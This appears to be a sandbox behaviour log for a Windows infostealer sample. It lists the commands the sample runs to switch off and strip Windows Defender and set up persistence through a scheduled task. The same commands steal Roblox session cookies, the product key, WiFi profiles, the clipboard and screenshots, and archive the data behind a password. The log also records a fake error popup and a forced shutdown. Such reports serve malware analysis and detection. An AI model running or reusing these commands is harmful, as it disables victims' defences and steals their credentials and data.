Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Process created: C:\Windows\System32\shutdown.exe shutdown.exe /f /s /t 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: libffi-8.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: libcrypto-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: libssl-3.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Section loaded: ucrtbase_clr0400.dll
